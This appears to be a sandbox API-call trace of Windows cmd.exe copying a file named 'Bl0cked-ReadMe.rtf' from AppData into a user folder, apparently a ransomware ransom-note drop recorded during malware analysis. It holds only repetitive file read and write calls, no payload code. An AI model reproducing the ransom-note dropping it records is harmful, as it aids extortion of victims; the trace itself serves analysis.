_get_osfhandle (_FileHandle=1) returned 0x7 [0232.616] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.616] GetFileType (hFile=0x7) returned 0x2 [0232.782] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.782] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf618 | out: lpMode=0x2cf618) returned 1 [0232.782] _dup (_FileHandle=1) returned 3 [0232.783] _close (_FileHandle=1) returned 0 [0232.783] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0232.783] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2cf5e8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0232.783] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0232.783] GetConsoleTitleW (in: lpConsoleTitle=0x2cf418, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.783] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0232.783] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0232.783] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0232.783] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0232.784] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.784] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2cef7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cef7c) returned 0x360ee0 [0232.785] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0232.785] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0232.785] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0232.785] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2cde88, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0232.785] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0232.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.785] GetFileType (hFile=0x54) returned 0x1 [0232.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.785] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2cdee0 | out: lpFileSizeHigh=0x2cdee0*=0x0) returned 0x1632 [0232.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.785] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0232.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.785] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x200, lpOverlapped=0x0) returned 1 [0232.786] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.786] GetFileType (hFile=0x4c) returned 0x1 [0232.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.787] GetFileType (hFile=0x4c) returned 0x1 [0232.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.787] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] GetFileType (hFile=0x4c) returned 0x1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced68*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] GetFileType (hFile=0x4c) returned 0x1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cedb8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] GetFileType (hFile=0x4c) returned 0x1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee08*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] GetFileType (hFile=0x4c) returned 0x1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee58*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] GetFileType (hFile=0x4c) returned 0x1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceea8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceea8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] GetFileType (hFile=0x4c) returned 0x1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceef8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceef8*, lpNumberOfBytesWritten=0x2cdefc*=0x20, lpOverlapped=0x0) returned 1 [0232.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.789] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.789] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.789] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x200, lpOverlapped=0x0) returned 1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] GetFileType (hFile=0x4c) returned 0x1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] GetFileType (hFile=0x4c) returned 0x1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] GetFileType (hFile=0x4c) returned 0x1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced68*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] GetFileType (hFile=0x4c) returned 0x1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cedb8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] GetFileType (hFile=0x4c) returned 0x1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee08*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] GetFileType (hFile=0x4c) returned 0x1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee58*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] GetFileType (hFile=0x4c) returned 0x1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceea8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceea8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] GetFileType (hFile=0x4c) returned 0x1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceef8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceef8*, lpNumberOfBytesWritten=0x2cdefc*=0x20, lpOverlapped=0x0) returned 1 [0232.790] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.790] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.790] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.790] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x200, lpOverlapped=0x0) returned 1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] GetFileType (hFile=0x4c) returned 0x1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] GetFileType (hFile=0x4c) returned 0x1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] GetFileType (hFile=0x4c) returned 0x1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced68*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] GetFileType (hFile=0x4c) returned 0x1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cedb8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] GetFileType (hFile=0x4c) returned 0x1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee08*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] GetFileType (hFile=0x4c) returned 0x1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee58*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] GetFileType (hFile=0x4c) returned 0x1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceea8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceea8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] GetFileType (hFile=0x4c) returned 0x1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceef8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceef8*, lpNumberOfBytesWritten=0x2cdefc*=0x20, lpOverlapped=0x0) returned 1 [0232.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.791] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.791] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x200, lpOverlapped=0x0) returned 1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] GetFileType (hFile=0x4c) returned 0x1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] GetFileType (hFile=0x4c) returned 0x1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] GetFileType (hFile=0x4c) returned 0x1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced68*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] GetFileType (hFile=0x4c) returned 0x1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cedb8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] GetFileType (hFile=0x4c) returned 0x1 [0232.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.792] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee08*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.792] GetFileType (hFile=0x4c) returned 0x1 [0232.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.792] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee58*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.792] GetFileType (hFile=0x4c) returned 0x1 [0232.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.792] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceea8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceea8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.792] GetFileType (hFile=0x4c) returned 0x1 [0232.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.792] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceef8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceef8*, lpNumberOfBytesWritten=0x2cdefc*=0x20, lpOverlapped=0x0) returned 1 [0232.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.792] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.792] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x200, lpOverlapped=0x0) returned 1 [0232.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.792] GetFileType (hFile=0x4c) returned 0x1 [0232.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] GetFileType (hFile=0x4c) returned 0x1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] GetFileType (hFile=0x4c) returned 0x1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced68*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] GetFileType (hFile=0x4c) returned 0x1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cedb8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] GetFileType (hFile=0x4c) returned 0x1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee08*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] GetFileType (hFile=0x4c) returned 0x1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee58*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] GetFileType (hFile=0x4c) returned 0x1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceea8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceea8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] GetFileType (hFile=0x4c) returned 0x1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceef8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceef8*, lpNumberOfBytesWritten=0x2cdefc*=0x20, lpOverlapped=0x0) returned 1 [0232.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.793] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.794] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x200, lpOverlapped=0x0) returned 1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] GetFileType (hFile=0x4c) returned 0x1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] GetFileType (hFile=0x4c) returned 0x1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] GetFileType (hFile=0x4c) returned 0x1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced68*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] GetFileType (hFile=0x4c) returned 0x1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cedb8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] GetFileType (hFile=0x4c) returned 0x1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee08*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] GetFileType (hFile=0x4c) returned 0x1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee58*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] GetFileType (hFile=0x4c) returned 0x1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceea8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceea8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] GetFileType (hFile=0x4c) returned 0x1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceef8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceef8*, lpNumberOfBytesWritten=0x2cdefc*=0x20, lpOverlapped=0x0) returned 1 [0232.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.795] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.795] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x200, lpOverlapped=0x0) returned 1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] GetFileType (hFile=0x4c) returned 0x1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] GetFileType (hFile=0x4c) returned 0x1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] GetFileType (hFile=0x4c) returned 0x1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced68*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] GetFileType (hFile=0x4c) returned 0x1 [0232.795] 